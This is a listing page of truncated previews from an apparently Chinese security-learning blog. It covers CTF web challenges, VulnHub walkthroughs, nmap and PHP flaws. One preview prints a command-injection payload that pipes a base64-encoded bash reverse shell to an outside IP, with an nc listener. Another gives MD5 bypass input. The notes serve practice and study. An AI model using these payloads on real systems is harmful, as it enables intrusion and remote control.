2024第十五届极客大挑战--Web-ez_SSRF 题目来源:2024第十五届极客大挑战–ez_SSRF 源码中得不到什么信息,用dirsearch扫描目录 可以扫出/www.zip文件,访问下载到源码,有如下三个文件 先看看index.php文件,不过没啥用 123<?phpecho "Maybe you should check check some place in my website";?> 再看看 2025-04-29 漏洞笔记 > SSRF > 题目 #SSRF
DS_Store泄露 什么是.DS_Store.DS_Store 是 “Desktop Services Store” 的缩写,是 Mac OS 系统自动为每个文件夹创建的隐藏文件2。它主要用于存储文件夹的显示属性,如文件图标的摆放位置、视图设置、背景颜色等,以便让用户在下次打开文件夹时能保持之前的个性化设置 .DS_Store文件泄露由于开发/设计人员在发布代码时未删除文件夹中隐藏的.DS_store,.D 2025-04-29 漏洞笔记 > 信息搜集 #信息搜集 DS_Store泄露
NewYear CTF 2025--Web-🐍年大吉 题目网址:https://ctf.xidian.edu.cn/training/16?challenge=704 给了题目附件 app.py源码如下 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566 2025-04-29 漏洞笔记 > 文件上传 > 题目 #文件上传 源码覆盖
nmap的使用 参考文章: https://blog.csdn.net/2302_82189125/article/details/135961736 nmap的主要功能kali自带nmap,可以直接使用 主机发现: Nmap 可以通过发送网络探测包(ping 扫描)来确定一个网络中活跃的主机。这有助于确定哪些 IP 地址上有活动的设备。 端口扫描: Nmap 可以扫描目标主机的开放端口,帮助确定哪些服务正 2025-04-26 渗透 > 小知识 #渗透打靶 小知识
VulnHub靶机Earth复现 借鉴文章: https://blog.csdn.net/Czheisenberg/article/details/122900121 https://www.cnblogs.com/sainet/p/15638010.html 安装靶机靶机网址:https://www.vulnhub.com/entry/the-planets-earth,755/ VirtualBox网址:https://w 2025-04-26 渗透 > VulnHub #渗透 打靶 复现
VulnHub靶机MoneyBox复现 借鉴文章: https://blog.csdn.net/YueXuan_521/article/details/135324089 https://blog.csdn.net/Aluxian_/article/details/128672602 安装靶机靶机网址:https://www.vulnhub.com/entry/moneybox-1,653/ VirtualBox网址:https:/ 2025-04-26 渗透 > VulnHub #渗透 打靶 复现
符号链接突破目录限制 源码如下 1234567891011<?phphighlight_file(__FILE__);require_once 'starven_secret.php';if(isset($_GET['file'])) { if(preg_match('/starven_secret.php/i', $_GET[' 2025-04-25 小知识 #小知识
sprintf漏洞 sprintf函数函数功能sprintf是 PHP 中一个格式化字符串的函数,功能是根据指定的格式化字符串,将一系列参数转换并格式化为一个新的字符串 函数语法1sprintf(format, arg1, arg2,...) format:是必需参数,规定字符串以及如何格式化其中的变量,如果 format 字符串中不包含任何占位符(如 %s、%d 等),那么可以不需要额外的 arg 参数 arg 2025-04-25 小知识 #小知识
提权 用VPS反弹shell攻击机监听端口 1nc -lvp 2333 目标机 123127.0.0.1 | echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjIuNzUuMTI2LzIzMzMgMD4mMQ== | base64 -d| /bin/bash127.0.0.1 | echo bash -i >& /dev/tcp/47.122.75.126/2 2025-04-25 小知识 #小知识
MD5绕过 123对于:(string)$_GET['md5_1'] !== (string)$_GET['md5_2'] && md5($_GET['md5_1']) === md5($_GET['md5_2'])● md5_1=%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6 2025-04-25 漏洞笔记 > PHP特性 #小知识